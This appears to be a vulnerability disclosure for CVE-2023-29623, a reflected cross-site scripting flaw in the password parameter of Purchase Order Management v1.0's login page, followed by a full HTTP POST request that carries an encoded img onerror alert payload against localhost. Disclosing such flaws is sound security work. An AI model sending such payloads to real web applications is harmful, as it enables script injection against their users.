Headline
CVE-2023-29623: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty
Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.
The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application’s response.
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Referer: http://localhost/purchase_order/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37
username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g